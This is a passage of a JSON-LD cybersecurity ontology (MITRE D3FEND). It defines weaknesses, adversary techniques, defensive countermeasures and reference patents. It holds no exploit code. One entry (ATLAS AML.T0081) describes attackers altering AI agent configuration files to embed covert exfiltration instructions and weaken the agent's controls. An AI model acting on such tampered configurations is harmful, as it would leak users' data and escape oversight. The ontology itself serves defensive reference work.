      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1221",
      "d3f:definition": "Hardware description language code incorrectly defines register defaults or hardware Intellectual Property (IP) parameters to insecure values.",
      "rdfs:label": "Incorrect Register Defaults or Module Parameters",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1419"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1052",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1052",
      "d3f:definition": "The product initializes a data element using a hard-coded literal that is not a simple integer or static constant element.",
      "rdfs:label": "Excessive Use of Hard-Coded Literals in Initialization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1419"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:Reference-SystemAndAMethodForIdentifyingThePresenceOfMalwareAndRansomwareUsingMini-trapsSetAtNetworkEndpoints_FidelisCybersecuritySolutionsInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9807115B2/en?oq=US-9807115-B2"
      },
      "d3f:kb-abstract": "A system for identifying the presence of ransomware on a network, including a plurality of resources, interconnected to form a network and at least one decoy drive.The decoy drive includes a plurality of decoy files to be encrypted by the ransomware, and wherein the decoy drive continuously provides the decoy files thereby continuously occupying the ransomware.",
      "d3f:kb-author": "Doron Kolton; Rami Mizrahi; Omer Zohar; Benny Ben-Rabi; Alex Barbalat; Shlomi Gabai",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Fidelis Cybersecurity Solutions Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyFile"
      },
      "d3f:kb-reference-title": "System and a method for identifying the presence of malware and ransomware using mini-traps set at network endpoints",
      "rdfs:label": "Reference - System and a method for identifying the presence of malware and ransomware using mini-traps set at network endpoints - Fidelis Cybersecurity Solutions Inc"
    },
    {
      "@id": "d3f:process-command-line-arguments",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x process-command-line-arguments y: The process x has the process command line arguments data y.",
      "rdfs:label": "process-command-line-arguments",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-data-property"
      }
    },
    {
      "@id": "d3f:T1070.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1070.007",
      "d3f:definition": "Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.",
      "rdfs:label": "Clear Network Connection History and Configurations",
      "rdfs:subClassOf": {
        "@id": "d3f:T1070"
      }
    },
    {
      "@id": "d3f:FirmwareEmbeddedMonitoringCode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FirmwareEmbeddedMonitoringCode"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Firmware"
      },
      "d3f:d3fend-id": "D3-FEMC",
      "d3f:definition": "Monitoring code is injected into firmware for integrity monitoring of firmware and firmware data.",
      "d3f:kb-article": "## How it works\nFirmware in deployed network devices is typically not monitored for malicious changes. This technique provides a method to embed a software security component into the deployed firmware which provides a near real-time monitoring hook. The exception handling code, in the firmware, is typically used to expose any detected vulnerabilities.\n\nThe injected software components provide a feature similar to intrusion detection systems for the firmware by detecting unauthorized modifications of the embedded firmware. The integrity of static code and firmware data are monitored continuously in the hosted devices. Comparisons are made to monitored elements like firmware memory addresses and data segments. Memory pages are scanned and if a modification is detected the software component may lock the page. This will protect subsequent attempted modifications to the firmware. The software component may utilize the exception handling code and thus be able to disclose the exact address of the modified memory.\n\nThe injected software components are inserted during the firmware imaging process. The injected software is assumed to have knowledge of both the embedded code and the current execution state of the host program. The injected software will monitor and alert, in near real-time, on potential suspicious activity. The injected code is run alongside of the embedded code in the host. The injected software operates as an independent entity and is not dependent on the host software.\n\nFinally, this technique may implement other countermeasure techniques as part of their analytical processes. These should be identified by referencing other countermeasure techniques directly as necessary.\n\n## Considerations\n* The firmware code will need to be modified and re-hosted on the device.\n* Exposing monitoring hooks to the injected code may introduce additional risk.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FirmwareEmbeddedMonitoringCodeRedBalloon"
        },
        {
          "@id": "d3f:Reference-FirmwareEmbeddedMonitoringCodeSymbiotes"
        }
      ],
      "rdfs:label": "Firmware Embedded Monitoring Code",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N275450231dde48a1a5211ce37fd6f5dc"
        }
      ]
    },
    {
      "@id": "_:N275450231dde48a1a5211ce37fd6f5dc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:T1573.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1573.002",
      "d3f:creates": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "d3f:definition": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.",
      "d3f:may-transfer": {
        "@id": "d3f:CertificateFile"
      },
      "rdfs:label": "Asymmetric Cryptography",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1573"
        },
        {
          "@id": "_:N436bd4f4efcd48aeb50789eca5a58ad4"
        },
        {
          "@id": "_:N813cd6b8d5f246b98c421274f0ce71b5"
        }
      ]
    },
    {
      "@id": "_:N436bd4f4efcd48aeb50789eca5a58ad4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      }
    },
    {
      "@id": "_:N813cd6b8d5f246b98c421274f0ce71b5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-transfer"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "d3f:CWE-554",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-554",
      "d3f:definition": "The ASP.NET application does not use an input validation framework.",
      "rdfs:label": "ASP.NET Misconfiguration: Not Using Input Validation Framework",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:KerberosTicketGrantingTicketAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:KerberosTicketGrantingTicket"
      },
      "d3f:definition": "KRBTGT is an account used by Key Distribution Center (KDC) service to issue Ticket Granting Tickets (TGTs) as part of the Kerberos authentication protocol.",
      "d3f:synonym": "krbtgt",
      "rdfs:label": "Kerberos Ticket Granting Ticket Account",
      "rdfs:seeAlso": {
        "@id": "https://blog.quest.com/what-is-krbtgt-and-why-should-you-change-the-password/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceAccount"
        },
        {
          "@id": "_:N59e92987ef9349409f47a448d72c4fda"
        }
      ]
    },
    {
      "@id": "_:N59e92987ef9349409f47a448d72c4fda",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KerberosTicketGrantingTicket"
      }
    },
    {
      "@id": "d3f:Reference-MalwareDetectionInEventLoops_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190205530A1"
      },
      "d3f:kb-abstract": "Example techniques locate or identify malware based on events from or at monitored computing devices. A control unit can detect a sequence of events of various types. The control unit can locate a loop within the sequence of events based at least in part on relative frequencies of the event types. The control unit can determine a distribution of event types of the events within the loop, and determining that software running the sequence is associated with malware based at least in part on the distribution of event types within the loop. In some examples, the control unit can locate a point of commonality among a plurality of stack traces associated with respective events within the loop. The control unit can determine a malware module comprising the point of commonality.",
      "d3f:kb-author": "Daniel W. Brown",
      "d3f:kb-mitre-analysis": "The patent describes determining if a sequence of events associated with a process are associated with malware. Based on the relative frequency of events, a loop within a sequence of events is located and a distribution of the events within the loop is determined. The distribution of events is then compared against a catalog of distributions to determine if it is associated with malware.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "Malware detection in event loops",
      "rdfs:label": "Reference - Malware detection in event loops - Crowdstrike Inc"
    },
    {
      "@id": "d3f:CWE-349",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-349",
      "d3f:definition": "The product, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted.",
      "rdfs:label": "Acceptance of Extraneous Untrusted Data With Trusted Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:ProximitySensorEvent",
      "@type": "owl:Class",
      "rdfs:label": "Proximity Sensor Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessAlarmEvent"
        },
        {
          "@id": "_:Nd4d800bb58794bc69faad94adcb9bfd4"
        }
      ]
    },
    {
      "@id": "_:Nd4d800bb58794bc69faad94adcb9bfd4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProximitySensor"
      }
    },
    {
      "@id": "d3f:OSAPIFreeMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that releases or deallocates memory that was previously allocated by the program.",
      "d3f:invokes": {
        "@id": "d3f:FreeMemory"
      },
      "rdfs:label": "OS API Free Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N8b4f23f4a2014ef5b32963ed89a8f30d"
        }
      ]
    },
    {
      "@id": "_:N8b4f23f4a2014ef5b32963ed89a8f30d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FreeMemory"
      }
    },
    {
      "@id": "d3f:T1543",
      "@type": "owl:Class",
      "d3f:attack-id": "T1543",
      "d3f:definition": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons)",
      "rdfs:label": "Create or Modify System Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1602.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1602.001",
      "d3f:definition": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).",
      "rdfs:label": "SNMP (MIB Dump)",
      "rdfs:subClassOf": {
        "@id": "d3f:T1602"
      }
    },
    {
      "@id": "d3f:OTExceptionMessage",
      "@type": "owl:Class",
      "d3f:definition": "An unknown or anomalous condition occurred in the system.",
      "rdfs:comment": [
        "BACnet: Reject: 1\nBACnet: Reject: 2\nBACnet: Reject: 3\nBACnet: Reject: 4\nBACnet: Reject: 5\nBACnet: Reject: 6\nBACnet: Reject: 7\nBACnet: Reject: 8\nBACnet: Reject: 9\nBACnet: Reject: 10 ",
        "Modbus: Read Exception Status\nModbus: Exception: Illegal Function\nModbus: Exception: Illegal Data Address\nModbus: Exception: Illegal Data Value\nModbus: Exception: Slave Device Failure\nModbus: Exception: Acknowledge\nModbus: Exception: Slave Device Busy\nModbus: Exception: Memory Parity Error\nModbus: Exception: Gateway Path Unavailable\nModbus: Exception: Gateway Target Device Failed to Respond"
      ],
      "rdfs:label": "OT Exception Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDiagnosticsMessage"
      }
    },
    {
      "@id": "d3f:ProcessAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessAnalysis"
      ],
      "d3f:d3fend-id": "D3-PA",
      "d3f:definition": "Process Analysis consists of observing a running application process and analyzing it to watch for certain behaviors or conditions which may indicate adversary activity. Analysis can occur inside of the process or through a third-party monitoring application. Examples include monitoring system and privileged calls, monitoring process initiation chains, and memory boundary allocations.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "rdfs:label": "Process Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N2c95e31f2b9c411eb24be5714099378e"
        }
      ]
    },
    {
      "@id": "_:N2c95e31f2b9c411eb24be5714099378e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:Range",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RAN",
      "d3f:definition": "The range of a set of data is the difference between the largest and smallest value.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Range (statistics). [Link](https://en.wikipedia.org/wiki/Range_(statistics))",
      "rdfs:label": "Range",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:TransferAgentAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:TransferAgentAuthentication"
      ],
      "d3f:d3fend-id": "D3-TAAN",
      "d3f:definition": "Validating that server components of a messaging infrastructure are authorized to send a particular message.",
      "d3f:kb-article": "## How it works\nTransfer Agent Authentication can be accomplished in different ways for depending on the protocol. In Email, Sender Policy Framework (SPF), Domain Key Identified Email (DKIM) or Domain-based Message Authentication Reporting and Conformance (DMARC) are used to validate sender domain ownership.\n\n### SPF\nSPF protocol allows for mail domain owners to specify the mail servers they use when sending email. SPF requires the use of SPF records published in the Domain Name System (DNS). The records record the authorized IPs for email senders. SPF uses the return-path address for domain IP identification. Email that is forwarded may cause the return-path validation problems.\n### DKIM\nDKIM also uses a record entry in DNS for authentication but does not rely on the simple return-path for validation. A signature header is added to email and encryption is used for security. This adds an additional layer of complexity and requires that DKIM servers be configured identified cryptographic signatures. The additional complexity results in a validation process that can survive complex routing of emails.\n\n### DMARC\nDMARC is an email policy and authentication protocol that seeks to ensure that the \"From\" field of emails is not spoofed. DMARC makes use of both SPF records and DKIM published key validation. DMARC also has a decision policy framework, contained in a DMARC record, for handling of rejected email. The DMARC framework also updates DMARC domains with authentication statues for allowed senders of that domain.\n\n## Considerations\n- Additional work is required to ensure that all SPF, DKIM and DMARC records are current and up to date.\n- Maintenance of DKIM signing keys is needed.\n- Using SPF without DKIM and DMARC verifies the Return-Path domain however does not prevent spoofing of the displayed From: address.\n- Parts of an email that are not signed or verified by email authentication methods, such as the message body or the header To: and Subject: fields, can be altered or modified.\n- Email message authentication does not replace the need to do email content analysis since executables, attachments, or links or other parts of the email beyond the sender domain are not verified.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DomainKeysIdentifiedMail-Signatures-IETF"
        },
        {
          "@id": "d3f:Reference-RFC7208-SenderPolicyFramework-SPF-ForAuthorizingUseOfDomainsInEmail-IETF"
        },
        {
          "@id": "d3f:Reference-RFC7489-Domain-basedMessageAuthentication-Reporting-AndConformance-DMARC"
        }
      ],
      "rdfs:label": "Transfer Agent Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:MessageHardening"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the removal of a registry key from the Windows Registry, including its hierarchical structure and associated metadata.",
      "rdfs:label": "Windows Registry Key Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:N1a1051210e0c4db7881c2acb211e6645"
        }
      ]
    },
    {
      "@id": "_:N1a1051210e0c4db7881c2acb211e6645",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:BinarySegment",
      "@type": "owl:Class",
      "d3f:definition": "A binary segment is a partition of binary information within a larger binary object, which arranges a set of binary objects for its purpose.   For example, code, data, heap, and stack segments are segments of the binary information used by a process.  Code and data segments are also found in object files.",
      "rdfs:label": "Binary Segment",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:CWE-286",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-286",
      "d3f:definition": "The product does not properly manage a user within its environment.",
      "rdfs:label": "Incorrect User Management",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CCI-001092_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects against or limits the effects of the organization-defined or referenced types of denial of service attacks.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001092"
    },
    {
      "@id": "d3f:Transmitter",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A device or system that takes information and generates a signal suitable for propagation. It encodes and formats the content, impresses it on a physical carrier (such as electromagnetic fields, light, electrical currents, or acoustic waves), and performs signal conditioning—such as modulation, pulse shaping, pre-emphasis, and power amplification—to meet spectral, timing, and power requirements. A transmitter may be analog or digital, implemented in hardware, software, or both, and is designed to launch the signal into the chosen medium with characteristics that enable reliable reception.",
      "d3f:transmits": {
        "@id": "d3f:Signal"
      },
      "rdfs:label": "Transmitter",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Signal_transmission"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:N499fd9bb571f43adb0a7ce7a25fbafc4"
        }
      ]
    },
    {
      "@id": "_:N499fd9bb571f43adb0a7ce7a25fbafc4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:transmits"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Signal"
      }
    },
    {
      "@id": "d3f:causes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x causes y: The event or action x brings about event or action y as a consequence.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.commoncoreontologies.org/ont00001803"
      },
      "rdfs:label": "causes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1325",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1325",
      "d3f:definition": "The product manages a group of objects or resources and performs a separate memory allocation for each object, but it does not properly limit the total amount of memory that is consumed by all of the combined objects.",
      "d3f:synonym": "Stack Exhaustion",
      "rdfs:label": "Improperly Controlled Sequential Memory Allocation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-770"
      }
    },
    {
      "@id": "d3f:T1079",
      "@type": "owl:Class",
      "d3f:attack-id": "T1079",
      "d3f:definition": "An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1573",
      "rdfs:label": "Multilayer Encryption",
      "rdfs:seeAlso": {
        "@id": "d3f:T1573"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001133_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system terminates the network connection associated with a communications session at the end of the session or after an organization-defined time period of inactivity.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SessionDurationAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001133"
    },
    {
      "@id": "d3f:LogicalLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Logical Link is an abstract or virtual connection between two entities that facilitates communication or data exchange without requiring a direct physical connection.",
      "rdfs:label": "Logical Link",
      "rdfs:subClassOf": {
        "@id": "d3f:Link"
      }
    },
    {
      "@id": "d3f:Reference-DetectingDDoSAttackUsingSnort",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.researchgate.net/publication/338660054_DETECTING_DDoS_ATTACK_USING_Snort"
      },
      "d3f:kb-abstract": "A DDoS (Distributed Denial-of-Service) attack is very common and easy toexecute and does not require any sophisticated tools. It can happen to anyone. In this project we deploy snort in our home network as a NIDS (Network Intrusion Detection System) to detect a DDoS attack and prevent it.",
      "d3f:kb-author": "Manas Gogoi, Sourav Mishra",
      "d3f:kb-organization": "Indian Institute of Information Technology Allahabad",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundSessionVolumeAnalysis"
      },
      "d3f:kb-reference-title": "DETECTING DDoS ATTACK USING Snort",
      "rdfs:label": "Reference - Detecting DDoS Attack Using Snort"
    },
    {
      "@id": "d3f:T1546.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.006",
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.",
      "d3f:modifies": {
        "@id": "d3f:ExecutableBinary"
      },
      "rdfs:label": "LC_LOAD_DYLIB Addition",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N27eddeef4d0748db806aa34708ead433"
        }
      ]
    },
    {
      "@id": "_:N27eddeef4d0748db806aa34708ead433",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "d3f:UserAccountMFAEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where multi-factor authentication (MFA) is enabled for a user account.",
      "rdfs:label": "User Account MFA Enable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N62357ae9f86046669961dfa9222f0eeb"
        }
      ]
    },
    {
      "@id": "_:N62357ae9f86046669961dfa9222f0eeb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:CCI-000199_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces maximum password lifetime restrictions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000199"
    },
    {
      "@id": "d3f:BootSector",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A boot record [boot sector] is the sector of a persistent data storage device (e.g., hard disk, floppy disk, optical disc, etc.) which contains machine code to be loaded into random-access memory (RAM) and then executed by a computer system's built-in firmware (e.g., the BIOS, Das U-Boot, etc.).",
      "rdfs:label": "Boot Sector",
      "rdfs:seeAlso": {
        "@id": "dbr:Boot_sector"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:BootRecord"
      }
    },
    {
      "@id": "d3f:AML.T0081",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0081",
      "d3f:definition": "Adversaries may modify the configuration files for AI agents on a system. This allows malicious changes to persist beyond the life of a single agent and affects any agents that share the configuration.\n\nConfiguration changes may include modifications to the system prompt, tampering with or replacing knowledge sources, modification to settings of connected tools, and more. Through those changes, an attacker could redirect outputs or tools to malicious services, embed covert instructions that exfiltrate data, or weaken security controls that normally restrict agent behavior.",
      "rdfs:label": "Modify AI Agent Configuration - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0081"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASPersistenceTechnique"
      },
      "skos:prefLabel": "Modify AI Agent Configuration"
    },
    {
      "@id": "d3f:T0821",
      "@type": "owl:Class",
      "d3f:attack-id": "T0821",
      "d3f:definition": "Adversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller.",
      "rdfs:label": "Modify Controller Tasking - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Modify Controller Tasking"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Event Logging",
      "d3f:exactly": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AU-2"
    },
    {
      "@id": "d3f:OutboundInternetEncryptedTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet encrypted traffic is encrypted network traffic on an outgoing connection initiated from a host within a network to a host outside the network.",
      "rdfs:label": "Outbound Internet Encrypted Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:LongShort-termMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LSTM",
      "d3f:definition": "Unlike standard feedforward neural networks, LSTM has feedback connections. Such a recurrent neural network (RNN) can process not only single data points (such as images), but also entire sequences of data (such as speech or video). This characteristic makes LSTM networks ideal for processing and predicting data",
      "d3f:kb-article": "## References\nWikipedia. (2021, September 29). Long short-term memory. [Link](https://en.wikipedia.org/wiki/Long_short-term_memory)",
      "rdfs:label": "Long Short-term Memory",
      "rdfs:subClassOf": {
        "@id": "d3f:RecurrentNeuralNetwork"
      }
    },
    {
      "@id": "d3f:EvictionEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An event describing actions to remove adversaries or malicious resources from a system, re-establishing security and operational integrity.",
      "d3f:related": {
        "@id": "d3f:Evict"
      },
      "rdfs:label": "Eviction Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SecurityEvent"
        },
        {
          "@id": "_:Na5e90e3b27c84dc28973b5c44708de1f"
        }
      ]
    },
    {
      "@id": "_:Na5e90e3b27c84dc28973b5c44708de1f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DetectionEvent"
      }
    },
    {
      "@id": "d3f:CCI-002041_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system allows the use of a temporary password for system logons with an immediate change to a permanent password.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002041"
    },
    {
      "@id": "d3f:CWE-340",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-340",
      "d3f:definition": "The product uses a scheme that generates numbers or identifiers that are more predictable than required.",
      "rdfs:label": "Generation of Predictable Numbers or Identifiers",
